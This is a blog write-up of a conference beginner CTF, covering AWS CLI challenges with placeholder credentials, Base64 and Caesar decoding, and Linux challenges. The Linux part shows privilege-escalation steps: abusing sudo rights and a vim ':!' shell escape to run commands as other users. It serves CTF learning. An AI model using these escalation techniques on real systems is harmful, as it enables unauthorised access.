This year’s Hackfest, nicknamed “Ressurection”, was the 14th edition of the conference. It was a great opportunity (for me at least) to reconnect with old colleagues I had not seen since 2020 and to meet new people.

This post is a partial writeup of the challenges I’ve had the time to solve as part of the Beginner CTF.

Due to time and logistical constraints, I opted to participate only in the Beginner CTF. It was available over the conference wifi network and did not require much preparation. Overall, it was a good refresher. The challenges that I’ve looked at were well made, kudos to the authors.

Here is how the organizers describe this CTF:

Beginner: A good place to start! Take on dozens of challenges created specifically for learning. Are you stuck on a challenge? Contact the creator of the challenge for an explanation and he will be happy to guide you!

AWS Track

This track was interesting because it explores some of the AWS CLI areas that I have personally never used.

Warning: The AWS access keys and tokens have been replaced with placeholders.

01 - AWS whoami (5 pts)

Challenge description:

In AWS, a user needs to generate an access key and a secret key to interact with the AWS API. Can you find out to whom this set of credentials belongs?

  • Access key: ${AWS_ACCESS_KEY_1}
  • Secret key: ${AWS_SECRET_ACCESS_1}

Note: The us-east-1 AWS region is to be used for all challenges in this category.

How to solve:

$ export AWS_ACCESS_KEY_ID="${AWS_ACCESS_KEY_1}"
$ export AWS_SECRET_ACCESS_KEY="${AWS_SECRET_ACCESS_1}"
$ export AWS_DEFAULT_REGION="us-east-1"
$ aws sts get-caller-identity
{
    "UserId": "AIDASECYGINVY654B7UBL",
    "Account": "012345678901",
    "Arn": "arn:aws:iam::012345678901:user/${HF_FLAG_1}"
}

The flag is in the ARN: ${HF_FLAG_1}

02 - AWS cat mysecrets.txt (6 pts)

Challenge description:

In AWS, Secrets Manager can act as a sort of password manager for your applications, and access to those secrets can be logged and restricted. Using the credentials given in the AWS whoami challenge, can you recover the flag stored in the following Secrets Manager secret?

hf-aws-beginner-challenge2-secret

How to solve:

$ # The environment variables set for the whoami challenge are still set
$ aws secretsmanager get-secret-value --secret-id hf-aws-beginner-challenge2-secret
{
    "ARN": "arn:aws:secretsmanager:us-east-1:012345678901:secret:hf-aws-beginner-challenge2-secret-1ZcN0L",
    "Name": "hf-aws-beginner-challenge2-secret",
    "VersionId": "88694825-9080-49ad-a01f-c22cc08f79ab",
    "SecretString": "${HF_FLAG_2}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1666218640.248
}

The flag is in the secret string: ${HF_FLAG_2}

03 - AWS ls and cp (7 pts)

Challenge description:

AWS S3 (Simple Storage Service) can be used to store files in a bucket like in a regular file system’s folder. Using the credentials given in the AWS whoami challenge, can you recover the flag from the following bucket?

hf-aws-beginner-challenge3-bucket-012345678901

How to solve:

$ # The environment variables set for the whoami challenge are still set
$ aws s3 ls s3://hf-aws-beginner-challenge3-bucket-012345678901
2022-10-19 18:32:13         36 flag.txt
$ aws s3 cp s3://hf-aws-beginner-challenge3-bucket-012345678901/flag.txt .
download: s3://hf-aws-beginner-challenge3-bucket-012345678901/flag.txt to ./flag.txt
$ cat flag.txt
${HF_FLAG_3}

The flag was in the flag.txt file: ${HF_FLAG_3}

04 - AWS mongodump (8 pts)

Challenge description:

AWS DynamoDB provides a fast key/value store similar to a MongoDB collection. Using the credentials given in the AWS whoami challenge, can you recover the flag from the following table?

hf-aws-beginner-challenge4-table

How to solve:

$ # The environment variables set for the whoami challenge are still set
$ aws dynamodb scan --table-name hf-aws-beginner-challenge4-table
{
    "Items": [
        {
            "flag": {
                "S": "${HF_FLAG_4}"
            }
        }
    ],
    "Count": 1,
    "ScannedCount": 1,
    "ConsumedCapacity": null
}

The flag was returned in the flag object: ${HF_FLAG_4}

05 - AWS sudo (9 pts)

Challenge description:

In AWS, you can assume different roles to interact with the AWS API as another resource. For example, you could assume the role of a Lambda function you created to troubleshoot its permissions. Using the credentials given in the AWS whoami challenge, can you assume the role arn:aws:iam::012345678901:role/hf-aws-beginner-challenge5-role and run the following command?

aws ssm get-parameter --name hf-aws-beginner-challenge5-parameter

How to solve:

$ # The environment variables set for the whoami challenge are still set
$ aws sts assume-role \
--role-arn "arn:aws:iam::012345678901:role/hf-aws-beginner-challenge5-role" \
--role-session-name AWSCLI-Session
{
    "Credentials": {
        "AccessKeyId": "${AWS_ACCESS_KEY_2}",
        "SecretAccessKey": "${AWS_SECRET_ACCESS_2}",
        "SessionToken": "${AWS_STS_TOKEN_1}",
        "Expiration": "2022-10-29T19:29:26Z"
    },
    "AssumedRoleUser": {
        "AssumedRoleId": "AROASECYGINV2VM2REZ34:AWSCLI-Session",
        "Arn": "arn:aws:sts::012345678901:assumed-role/hf-aws-beginner-challenge5-role/AWSCLI-Session"
    }
}

$ AWS_ACCESS_KEY_ID="${AWS_ACCESS_KEY_2}" \
AWS_SECRET_ACCESS_KEY="${AWS_SECRET_ACCESS_2}" \
AWS_SESSION_TOKEN="${AWS_STS_TOKEN_1}" \
aws ssm get-parameter --name hf-aws-beginner-challenge5-parameter
{
    "Parameter": {
        "Name": "hf-aws-beginner-challenge5-parameter",
        "Type": "String",
        "Value": "${HF_FLAG_5}",
        "Version": 1,
        "LastModifiedDate": 1666218640.537,
        "ARN": "arn:aws:ssm:us-east-1:012345678901:parameter/hf-aws-beginner-challenge5-parameter",
        "DataType": "text"
    }
}

The flag was in the Value of the returned Parameter object: ${HF_FLAG_5}

06 - AWS curl (10)

Challenge description:

In AWS, access to some publicly accessible resources (such as an S3 Bucket or an API Gateway) can be restricted using a signature mechanism. This signature can be generated using a set of AWS credentials and a library such as Python’s AWSRequestsAuth. Some tools, such as Postman, even integrate this signature mechanism in their supported authentication methods. Using the credentials given in the AWS whoami challenge, can you recover the flag from the following URL?

This challenge took me a while to figure out since I never had the opportunity to play with signed requests. I had to search on the Internet to find something that would suit.

How to solve:

  1. Make a virtualenv and install the aws-requests-auth package:
    $ python3 -m venv venv
    $ source venv/bin/activate
    $ pip install aws-requests-auth
    
  2. Create a small python script (solve_challenge_06.py) with the content:
    import os
    import requests
    from aws_requests_auth.aws_auth import AWSRequestsAuth
    from urllib.parse import urlparse
    
    # URL of the API Gateway endpoint, passed in through the environment
    url = os.getenv('HF_CHALLENGE_URL')
    # API Gateway requests are signed for the "execute-api" service
    aws_service = 'execute-api'
    
    # Build a SigV4 signer from the same credentials the AWS CLI is using
    auth = AWSRequestsAuth(
        aws_access_key=os.getenv('AWS_ACCESS_KEY_ID'),
        aws_secret_access_key=os.getenv('AWS_SECRET_ACCESS_KEY'),
        aws_region=os.getenv('AWS_DEFAULT_REGION'),
        aws_host=urlparse(url).netloc,
        aws_service=aws_service)
    
    # requests hands the prepared request to the signer, which adds the Authorization header
    response = requests.get(url, auth=auth)
    response.raise_for_status()
    print(response.text)
    
  3. Run the script:
    $ # The environment variables set for the whoami challenge are still set
    $ HF_CHALLENGE_URL="https://1f1xwaoef4.execute-api.us-east-1.amazonaws.com/api/" python3 solve_challenge_06.py
    {"flag":"${HF_FLAG_6}"}
    

The flag was found in the response data: ${HF_FLAG_6}
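
What AWSRequestsAuth does behind the scenes is AWS Signature Version 4. The block below is an added example, not code from this post nor from the aws-requests-auth project: a standard-library SigV4 signer that builds the canonical request, the string to sign, the derived signing key and the final Authorization header. The test vector it carries (access key AKIDEXAMPLE, the documentation secret key, an IAM ListUsers request dated 20150830T123600Z) is the public example from the AWS SigV4 documentation, and the execute-api URL in the __main__ block is a placeholder.

```python
"""AWS Signature Version 4, from scratch with the standard library.
Added example, not the post's code and not the aws-requests-auth library.
Test vector: the public IAM ListUsers example from the AWS SigV4 documentation."""
import datetime as dt
import hashlib
import hmac
from urllib.parse import parse_qsl, quote, urlparse

ALGORITHM = "AWS4-HMAC-SHA256"


def _sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def _hmac(key, msg):
    return hmac.new(key, msg.encode("utf-8"), hashlib.sha256).digest()


def signing_key(secret_key, date_stamp, region, service):
    """kSigning = HMAC(HMAC(HMAC(HMAC("AWS4"+secret, date), region), service), "aws4_request")."""
    k_date = _hmac(("AWS4" + secret_key).encode("utf-8"), date_stamp)
    k_region = _hmac(k_date, region)
    k_service = _hmac(k_region, service)
    return _hmac(k_service, "aws4_request")


def canonical_request(method, url, headers, payload):
    """Build the canonical request string and the SignedHeaders list."""
    parsed = urlparse(url)
    path = quote(parsed.path or "/", safe="/-_.~")
    pairs = sorted(parse_qsl(parsed.query, keep_blank_values=True))
    query = "&".join(f"{quote(k, safe='-_.~')}={quote(v, safe='-_.~')}" for k, v in pairs)
    # lowercase names, trimmed values with internal runs of spaces collapsed, sorted by name
    canon = {name.strip().lower(): " ".join(str(value).split()) for name, value in headers.items()}
    signed_headers = ";".join(sorted(canon))
    header_block = "".join(f"{name}:{canon[name]}\n" for name in sorted(canon))
    request = "\n".join([method.upper(), path, query, header_block, signed_headers, _sha256_hex(payload)])
    return request, signed_headers


def sign_request(method, url, access_key, secret_key, region, service,
                 headers=None, payload=b"", session_token=None, now=None):
    """Return the request headers with an Authorization header added, plus the intermediates."""
    hdrs = {name.lower(): value for name, value in (headers or {}).items()}
    hdrs.setdefault("host", urlparse(url).netloc)
    if "x-amz-date" not in hdrs:
        now = now or dt.datetime.now(dt.timezone.utc)
        hdrs["x-amz-date"] = now.strftime("%Y%m%dT%H%M%SZ")
    if session_token:  # temporary credentials must also present their session token, and it is signed
        hdrs["x-amz-security-token"] = session_token
    amz_date = hdrs["x-amz-date"]
    date_stamp = amz_date[:8]
    creq, signed_headers = canonical_request(method, url, hdrs, payload)
    scope = f"{date_stamp}/{region}/{service}/aws4_request"
    string_to_sign = "\n".join([ALGORITHM, amz_date, scope, _sha256_hex(creq.encode("utf-8"))])
    key = signing_key(secret_key, date_stamp, region, service)
    signature = hmac.new(key, string_to_sign.encode("utf-8"), hashlib.sha256).hexdigest()
    hdrs["authorization"] = (f"{ALGORITHM} Credential={access_key}/{scope}, "
                             f"SignedHeaders={signed_headers}, Signature={signature}")
    return {"headers": hdrs, "canonical_request": creq,
            "string_to_sign": string_to_sign, "signature": signature}


# Public AWS documentation example (not real credentials).
DOC_ACCESS_KEY = "AKIDEXAMPLE"
DOC_SECRET_KEY = "wJalrXUtnFEMI/K7MDENG+bPxRfiCYEXAMPLEKEY"
DOC_URL = "https://iam.amazonaws.com/?Action=ListUsers&Version=2010-05-08"
DOC_HEADERS = {"Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
               "Host": "iam.amazonaws.com", "X-Amz-Date": "20150830T123600Z"}

if __name__ == "__main__":
    import os
    # Usage for the challenge (placeholder URL): sign a GET for the execute-api service and
    # pass signed["headers"] to any HTTP client, e.g. requests.get(url, headers=signed["headers"]).
    url = os.environ.get("HF_CHALLENGE_URL", "https://EXAMPLE.execute-api.us-east-1.amazonaws.com/api/")
    signed = sign_request("GET", url, os.environ.get("AWS_ACCESS_KEY_ID", DOC_ACCESS_KEY),
                          os.environ.get("AWS_SECRET_ACCESS_KEY", DOC_SECRET_KEY),
                          "us-east-1", "execute-api", session_token=os.environ.get("AWS_SESSION_TOKEN"))
    print(signed["canonical_request"], signed["string_to_sign"], signed["headers"]["authorization"], sep="\n\n")
```

For an API Gateway endpoint the service name is execute-api and the body of a GET is empty, so the payload hash is the SHA-256 of the empty string. With temporary credentials (the ones returned by assume-role or Cognito in the challenges that follow), the session token must also be sent in an x-amz-security-token header and included in the signed headers; sign_request does that when session_token is given, which is also why a request signed with long-term keys and one signed with a role session never produce the same signature.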

07 - AWS python3 my_script.py (6 pts)

Challenge description:

AWS Lambda allows you to run code without the need to set up any server. It supports various programming languages, such as Node.js, Python, Ruby, Java, Go and .NET Core. Can you execute the following Lambda function?

hf-aws-beginner-challenge7-lambda

How to solve:

$ # The environment variables set for the whoami challenge are still set
$ aws lambda invoke --function-name hf-aws-beginner-challenge7-lambda lambda_exec.log
{
    "StatusCode": 200,
    "ExecutedVersion": "$LATEST"
}
$ cat lambda_exec.log
"${HF_FLAG_7}"

The flag was in the lambda function execution logs: ${HF_FLAG_7}

08 - AWS docker pull (8 pts)

Challenge description:

AWS ECR (Elastic Container Registry) acts as an AWS managed docker repository to host your container images. Can you pull and run the docker image from the following private ECR repository?

012345678901.dkr.ecr.us-east-1.amazonaws.com/hf-aws-beginner-challenge8-repository

How to solve:

  1. Use the get-login-password ECR command to configure the docker daemon login:
    $ # The environment variables set for the whoami challenge are still set
    $ aws ecr get-login-password | docker login --username AWS --password-stdin 012345678901.dkr.ecr.us-east-1.amazonaws.com
    WARNING! Your password will be stored unencrypted in /home/dtvezina/.docker/config.json.
    Configure a credential helper to remove this warning. See
    https://docs.docker.com/engine/reference/commandline/login/#credentials-store
    
  2. Pull the container image from the registry:
    $ docker pull 012345678901.dkr.ecr.us-east-1.amazonaws.com/hf-aws-beginner-challenge8-repository
    Using default tag: latest
    latest: Pulling from hf-aws-beginner-challenge8-repository
    213ec9aee27d: Pull complete 
    Digest: sha256:27f39eb1cc2372af477820713ea7604fb0b8a106bcc9f97c5c9c2031c00c137e
    Status: Downloaded newer image for 012345678901.dkr.ecr.us-east-1.amazonaws.com/hf-aws-beginner-challenge8-repository:latest
    012345678901.dkr.ecr.us-east-1.amazonaws.com/hf-aws-beginner-challenge8-repository:latest
    
  3. Check the container images available:
    $ docker image ls
    REPOSITORY                                                                           TAG       IMAGE ID       CREATED      SIZE
    012345678901.dkr.ecr.us-east-1.amazonaws.com/hf-aws-beginner-challenge8-repository   latest    8ebc85c05ed2   9 days ago   5.54MB
    
  4. Run the container image (we are trusting the challenge designers here - obviously do not run untrusted images in the real world)
    $ docker run 8ebc85c05ed2
    ${HF_FLAG_8}
    

The flag was printed in the container’s standard output: ${HF_FLAG_8}

09 - AWS cat /var/log/* (7 pts)

Challenge description:

AWS CloudWatch Logs allows you to centralize logs from pretty much everything, including AWS services, application logs or AWS API interactions. Log groups contain log streams, which in turn contain log events. Can you retrieve the events from the following log group?

hf-aws-beginner-challenge9-log-group

How to solve:

  1. Check which log streams are available in the log group hf-aws-beginner-challenge9-log-group:
    $ # The environment variables set for the whoami challenge are still set
    $ aws logs describe-log-streams --log-group-name hf-aws-beginner-challenge9-log-group
    {
        "logStreams": [
            {
                "logStreamName": "some-log-stream",
                "creationTime": 1666218648086,
                "firstEventTimestamp": 1666218452782,
                "lastEventTimestamp": 1666218452782,
                "lastIngestionTime": 1666218745806,
                "uploadSequenceToken": "49617124642278214119312939883891311975180274722603532770",
                "arn": "arn:aws:logs:us-east-1:012345678901:log-group:hf-aws-beginner-challenge9-log-group:log-stream:some-log-stream",
                "storedBytes": 0
            }
        ]
    }
    
  2. Get the content of the log stream named some-log-stream:
    $ aws logs get-log-events --log-group-name hf-aws-beginner-challenge9-log-group --log-stream-name some-log-stream
    {
        "events": [
            {
                "timestamp": 1666218452782,
                "message": "${HF_FLAG_9}",
                "ingestionTime": 1666218745806
            }
        ],
        "nextForwardToken": "f/37157913160581310312750303562572275654679098760710848512/s",
        "nextBackwardToken": "b/37157913160581310312750303562572275654679098760710848512/s"
    }
    

The flag was in the event message: ${HF_FLAG_9}

10 - AWS login (10 pts)

Challenge description:

Cognito Identity Pools can provide temporary AWS credentials for users based on tokens from several identity providers, such as Cognito, Amazon, Apple, Facebook, Google, Twitter, OpenID, SAML and more. This can allow for complex application flows, such as granting authenticated users of a Web application direct access to files in an S3 bucket. This can also be configured for guest (unauthenticated) users. Can you get guest temporary credentials for the following identity pool (use the same command as the AWS whoami challenge with the credentials you will find to get the flag)?

us-east-1:1d9c2acf-1d03-4f5e-b8a7-559f4d4c0eff

This challenge was also interesting. I had not played with Cognito so this was a learning experience for me.

How to solve:

  1. Get an identity ID from the identity pool:
    $ # The environment variables set for the whoami challenge are still set
    $ aws cognito-identity get-id --identity-pool-id us-east-1:1d9c2acf-1d03-4f5e-b8a7-559f4d4c0eff
    {
        "IdentityId": "us-east-1:27887403-1035-4c57-a1a0-2d9d636df012"
    }
    
  2. Get the credentials from the identity ID:
    $ aws cognito-identity get-credentials-for-identity --identity-id "us-east-1:27887403-1035-4c57-a1a0-2d9d636df012"
    {
        "IdentityId": "us-east-1:27887403-1035-4c57-a1a0-2d9d636df012",
        "Credentials": {
            "AccessKeyId": "${AWS_ACCESS_KEY_3}",
            "SecretKey": "${AWS_SECRET_ACCESS_3}",
            "SessionToken": "${AWS_STS_TOKEN_2}",
            "Expiration": 1667080099.0
        }
    }
    
  3. Let’s use STS to check the identity (similar to the whoami challenge):
    $ AWS_ACCESS_KEY_ID="${AWS_ACCESS_KEY_3}" \
    AWS_SECRET_ACCESS_KEY="${AWS_SECRET_ACCESS_3}" \
    AWS_SESSION_TOKEN="${AWS_STS_TOKEN_2}" \
    aws sts get-caller-identity
    {
        "UserId": "AROASECYGINV7KCTU6W4N:CognitoIdentityCredentials",
        "Account": "012345678901",
        "Arn": "arn:aws:sts::012345678901:assumed-role/${HF_FLAG_10}/CognitoIdentityCredentials"
    }
    

The flag was in the ARN: ${HF_FLAG_10}
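
Both the assume-role step of AWS sudo and the Cognito step of this challenge hand back temporary credentials that then have to be turned into the three AWS_* environment variables. The two responses differ in small ways that are easy to trip over: STS names the secret SecretAccessKey and gives an ISO 8601 expiration, whereas Cognito Identity names it SecretKey and gives an epoch timestamp. The block below is an added example (not the post's code) that normalises either shape, renders the export lines, reports whether the credentials have expired, and decodes the Arn that get-caller-identity returns. The sample responses are constructed with placeholder key material; the expiration values, identity ID and ARNs follow the outputs shown above.

```python
"""Normalise temporary AWS credentials (STS assume-role / Cognito Identity) into
environment variables and decode get-caller-identity ARNs.
Added example, not code from the post. Sample responses are constructed with
placeholder key material; expirations and ARNs follow the outputs in the write-up."""
import datetime as dt
import shlex

# Constructed sample: the shape returned by `aws sts assume-role`.
STS_SAMPLE = {
    "Credentials": {
        "AccessKeyId": "ACCESS-KEY-PLACEHOLDER-2",
        "SecretAccessKey": "SECRET-KEY-PLACEHOLDER-2",
        "SessionToken": "SESSION-TOKEN-PLACEHOLDER-1",
        "Expiration": "2022-10-29T19:29:26Z",
    },
    "AssumedRoleUser": {
        "AssumedRoleId": "AROAEXAMPLEPLACEHOLDER:AWSCLI-Session",
        "Arn": "arn:aws:sts::012345678901:assumed-role/hf-aws-beginner-challenge5-role/AWSCLI-Session",
    },
}

# Constructed sample: the shape returned by `aws cognito-identity get-credentials-for-identity`.
COGNITO_SAMPLE = {
    "IdentityId": "us-east-1:27887403-1035-4c57-a1a0-2d9d636df012",
    "Credentials": {
        "AccessKeyId": "ACCESS-KEY-PLACEHOLDER-3",
        "SecretKey": "SECRET-KEY-PLACEHOLDER-3",  # note: not "SecretAccessKey"
        "SessionToken": "SESSION-TOKEN-PLACEHOLDER-2",
        "Expiration": 1667080099.0,  # epoch seconds, not ISO 8601
    },
}


def credentials_to_env(response):
    """Map either response shape to the AWS_* variables the CLI and SDKs read."""
    creds = response["Credentials"]
    secret = creds.get("SecretAccessKey", creds.get("SecretKey"))
    if secret is None:
        raise KeyError("Credentials has neither SecretAccessKey nor SecretKey")
    env = {"AWS_ACCESS_KEY_ID": creds["AccessKeyId"], "AWS_SECRET_ACCESS_KEY": secret}
    if creds.get("SessionToken"):
        env["AWS_SESSION_TOKEN"] = creds["SessionToken"]  # mandatory with temporary credentials
    return env


def expiration_of(response):
    """Return the expiry as an aware UTC datetime whichever format the service used."""
    exp = response["Credentials"]["Expiration"]
    if isinstance(exp, (int, float)):
        return dt.datetime.fromtimestamp(exp, tz=dt.timezone.utc)
    return dt.datetime.fromisoformat(str(exp).replace("Z", "+00:00"))


def is_expired(response, now=None):
    now = now or dt.datetime.now(dt.timezone.utc)
    return expiration_of(response) <= now


def render_exports(env):
    """Shell lines equivalent to the `export ...` commands used in the whoami challenge."""
    return "\n".join(f"export {name}={shlex.quote(value)}" for name, value in env.items())


def parse_caller_identity(arn):
    """Decode the Arn field of get-caller-identity into account, principal type and names."""
    parts = arn.split(":", 5)
    if len(parts) != 6 or parts[0] != "arn":
        raise ValueError(f"not an ARN: {arn}")
    account, resource = parts[4], parts[5]
    kind, _, rest = resource.partition("/")
    info = {"account": account, "type": kind, "name": rest}
    if kind == "assumed-role":  # arn:aws:sts::ACCOUNT:assumed-role/ROLE/SESSION
        info["name"], _, info["session"] = rest.partition("/")
    return info


if __name__ == "__main__":
    for sample in (STS_SAMPLE, COGNITO_SAMPLE):
        print(render_exports(credentials_to_env(sample)))
        print("# expires", expiration_of(sample).isoformat(), "expired:", is_expired(sample))
    print(parse_caller_identity(STS_SAMPLE["AssumedRoleUser"]["Arn"]))
```

A user ARN (arn:aws:iam::ACCOUNT:user/NAME) and an assumed-role ARN (arn:aws:sts::ACCOUNT:assumed-role/ROLE/SESSION) are the two shapes seen in this track; the role name in the second one is exactly where the flag of this challenge sat.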

Cipher Track

This track covers some of the encoding techniques commonly used in CTFs.

Base64 (2 pts)

Challenge description:

If you see a string that seems encoded, contains only numbers, letters, / and = and might finish with either one or two = (but not all the time) you should try this decoding method. It is also used by pentesters to transfer files over the network and to make sure we are not missing any parts. Here is the string: SEYtMGEzMGI3MzBiNDRjNzhmMGMyZDdkMDRiNzQxNWVjOWY=

Base64 is commonly used not just in CTF but in many protocols as a form of encoding.

How to solve:

$ printf 'SEYtMGEzMGI3MzBiNDRjNzhmMGMyZDdkMDRiNzQxNWVjOWY=' | base64 -d; echo ""
${HF_FLAG_11}

The flag is: ${HF_FLAG_11}

Julius (3 pts)

Challenge description:

One of the first ciphers used in history.

Challenge:

XV-6v597s1ttqr467v7rv5498qqt1r41899

Julius refers to the Caesar cipher, which is a substitution cipher commonly used in CTF events.

How to solve:

  1. The easy way is to play around with the amount of the ROT13 operation in CyberChef
  2. When the output starts with HF-, you have the flag (in this case the amount is 10)

The flag is: ${HF_FLAG_12}
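
The two challenges of this track are the same routine every time: recognise the encoding, then decode it. The block below is an added example (not the post's code) that does both in code rather than in CyberChef: a Base64 sanity check that applies the rules stated in the Base64 challenge description (alphabet, padding, length a multiple of 4) before decoding strictly, and a Caesar brute-forcer that tries all 25 rotations and keeps the one that yields the HF- prefix, the same thing as turning the ROT13 amount in CyberChef until the flag appears. The inputs are the two challenge strings quoted above; the HF- prefix is this CTF's flag format.

```python
"""Base64 sanity check/decoder and Caesar brute-forcer for the Cipher track.
Added example, not the post's code. Inputs are the challenge strings from the write-up."""
import base64
import binascii
import re

B64_RE = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")


def looks_like_base64(s):
    """Alphabet, length multiple of 4, at most two '=' and only at the end, strict decode."""
    s = s.strip()
    if not s or len(s) % 4 or not B64_RE.match(s):
        return False
    try:
        base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def decode_base64(s):
    """Strict decode: any character outside the alphabet is an error, not silently dropped."""
    return base64.b64decode(s.strip(), validate=True)


def rotate(text, amount):
    """ROT-style shift (same meaning as CyberChef's ROT13 amount): letters move forward by
    `amount` within their case; digits and punctuation are left alone."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + amount) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + amount) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def caesar_bruteforce(ciphertext, prefix="HF-"):
    """Try the 25 non-trivial rotations; return (amount, plaintext) for the first one
    whose output starts with `prefix`, or None if no rotation produces it."""
    for amount in range(1, 26):
        candidate = rotate(ciphertext, amount)
        if candidate.startswith(prefix):
            return amount, candidate
    return None


if __name__ == "__main__":
    b64 = "SEYtMGEzMGI3MzBiNDRjNzhmMGMyZDdkMDRiNzQxNWVjOWY="
    if looks_like_base64(b64):
        print("base64:", decode_base64(b64).decode("utf-8"))
    caesar = "XV-6v597s1ttqr467v7rv5498qqt1r41899"
    print("caesar:", caesar_bruteforce(caesar))
```

Because only letters rotate, a Caesar-shifted hex flag keeps its digits intact, which is why the ciphertext above still looks half like a hash; the prefix check is what picks the right amount out of the 25 candidates without eyeballing each one.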

Linux Track

The Linux track is a relatively classic CTF sysadmin type of track.

SSH Key (2 pts)

Challenge description:

You are given an SSH key to the kingdom, do you know how to use it?

If you do, use it at beginner-linux.hfctf.ca with the user cerealkiller.

Note: you are rarely given an SSH key during real world penetration tests. However, it’s really good to learn to use it for security.

File: id_ed25519

How to solve:

$ chmod 600 id_ed25519
$ ssh-insecure -i id_ed25519 cerealkiller@beginner-linux.hfctf.ca
$ ls .
65  Allo  Allo.txt  Baron  Phil  PhiletPO  SHAWIGANG  flag.txt  flag.txt.save  holla  nancy  nmap  nmap.old  nmap.sh  test.lua  test.nse
$ cat flag.txt
${HF_FLAG_13}

The flag was in the flag.txt file: ${HF_FLAG_13}

Hidden File (3 pts)

Challenge description:

Get a shell as the user cerealkiller with the previous SSH key and look for a hidden file.

Requirement: You need to have done the SSH Challenge first

How to solve:

$ ls -hla
total 5.8M
drwxr-xr-x 11 cerealkiller cerealkiller 4.0K Oct 30 11:50 .
drwxr-xr-x 10 root         root         4.0K Nov 11  2021 ..
-rw-------  1 cerealkiller cerealkiller  242 Nov 20  2021 .Xauthority
-rw-r--r--  1 root         root            0 Jun 14  2019 .bash_history
-rw-r--r--  1 cerealkiller cerealkiller  220 Apr  4  2018 .bash_logout
-rw-r--r--  1 cerealkiller cerealkiller 3.7K Jun 21  2020 .bashrc
drwx------  3 cerealkiller cerealkiller 4.0K Nov 19  2021 .cache
drwx------  4 cerealkiller cerealkiller 4.0K Nov 20  2020 .config
drwx------  4 cerealkiller cerealkiller 4.0K Nov 20  2020 .gnupg
drwxr-xr-x  2 root         root         4.0K Oct 23 16:34 .hidden
-rw-------  1 cerealkiller cerealkiller  269 Oct 30 05:17 .lesshst
drwxrwxr-x  3 cerealkiller cerealkiller 4.0K Nov 20  2021 .local
-rw-r--r--  1 cerealkiller cerealkiller  807 Apr  4  2018 .profile
-rw-------  1 cerealkiller cerealkiller   20 Oct 29 23:48 .python_history
drwx------  2 cerealkiller cerealkiller 4.0K Oct 30 02:13 .ssh
-rw-------  1 cerealkiller cerealkiller  12K Jun 20  2020 .swp
drwxr-xr-x  2 cerealkiller cerealkiller 4.0K Oct 30 04:31 .vim
-rw-------  1 cerealkiller cerealkiller  11K Oct 30 11:50 .viminfo
-rw-rw-r--  1 cerealkiller cerealkiller    0 Oct 30 00:10 65
-rw-rw-r--  1 cerealkiller cerealkiller    0 Oct 30 01:36 Allo
-rw-rw-r--  1 cerealkiller cerealkiller  119 Oct 30 04:55 Allo.txt
drwxrwxr-x  3 cerealkiller cerealkiller 4.0K Oct 30 04:17 Baron
-rw-rw-r--  1 cerealkiller cerealkiller    0 Oct 30 01:36 Phil
-rw-rw-r--  1 cerealkiller cerealkiller    0 Oct 30 01:36 PhiletPO
-rw-rw-r--  1 cerealkiller cerealkiller    0 Oct 30 01:45 SHAWIGANG
----r-----  1 root         cerealkiller   36 Oct 23 16:29 flag.txt
----r-----  1 cerealkiller cerealkiller   71 Oct 30 01:16 flag.txt.save
-rwxr-xr-x  1 cerealkiller cerealkiller 2.9M Oct 29 18:51 holla
drwxrwxr-x  2 cerealkiller cerealkiller 4.0K Oct 30 11:50 nancy
-rw-rw-r--  1 cerealkiller cerealkiller   24 Oct 29 18:50 nmap
-rwxr-xr-x  1 cerealkiller cerealkiller 2.9M Oct 29 23:36 nmap.old
-rwxrwxrwx  1 cerealkiller cerealkiller   38 Oct 30 01:51 nmap.sh
-rw-rw-r--  1 cerealkiller cerealkiller   19 Oct 29 22:23 test.lua
-rwxrwxr-x  1 cerealkiller cerealkiller   22 Oct 30 01:15 test.nse

$ ls .hidden
flag.txt
$ cat .hidden/flag.txt
${HF_FLAG_14}

The flag was in the .hidden/flag.txt file: ${HF_FLAG_14}

Sudo (4 pts)

Challenge description:

The user cerealkiller has some sudo privileges. Learn to use sudo to be able to read the flag in the home directory of the user “phantom”.

Requirement: You need to have done the SSH Challenge first

Recommendation: Read on sudo

How to solve:

$ sudo -l
Matching Defaults entries for cerealkiller on ip-172-31-16-57:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cerealkiller may run the following commands on ip-172-31-16-57:
    (phantom) NOPASSWD: ALL
    (vimuser) NOPASSWD: /usr/bin/vim
    (nmapuser) NOPASSWD: /usr/bin/nmap
    (pathuser) NOPASSWD: /home/pathuser/pathuser.sh

$ sudo -u phantom ls -hla /home/phantom/
total 32K
drwxr-xr-x  2 phantom phantom 4.0K Oct 30 05:04 .
drwxr-xr-x 10 root    root    4.0K Nov 11  2021 ..
-rw-------  1 phantom phantom   17 Nov 19  2021 .bash_history
-rw-r--r--  1 phantom phantom  220 Apr  4  2018 .bash_logout
-rw-r--r--  1 phantom phantom 3.7K Apr  4  2018 .bashrc
-rw-r--r--  1 phantom phantom  807 Apr  4  2018 .profile
-rw-------  1 phantom phantom  703 Nov 20  2021 .viminfo
-r--------  1 phantom root      36 Oct 23 16:32 flag.txt

$ sudo -u phantom cat /home/phantom/flag.txt 
${HF_FLAG_15}

The flag was in the /home/phantom/flag.txt file: ${HF_FLAG_15}

VIM (5 pts)

Challenge description:

Vim is a popular text editor for Linux, but there is a lot more that you can do with it than just editing text. Can you find out what?

You are allowed to run vim as another user, learn what you can do with that.

How to solve:

$ sudo -u vimuser vim
# from inside vim (normal mode), run a shell command with :!

:!ls -hla /home/vimuser
total 72K
drwxr-xr-x  2 vimuser vimuser 4.0K Oct 30 07:40 .
drwxr-xr-x 10 root    root    4.0K Nov 11  2021 ..
-rw-r--r--  1 vimuser vimuser  220 Apr  4  2018 .bash_logout
-rw-r--r--  1 vimuser vimuser 3.7K Apr  4  2018 .bashrc
-rw-------  1 vimuser vimuser  12K Oct 30 02:04 .flag.txt.swn
-rw-------  1 vimuser vimuser  12K Oct 30 07:33 .flag.txt.swo
-rw-------  1 vimuser vimuser  12K Oct 29 22:58 .flag.txt.swp
-rw-r--r--  1 vimuser vimuser  807 Apr  4  2018 .profile
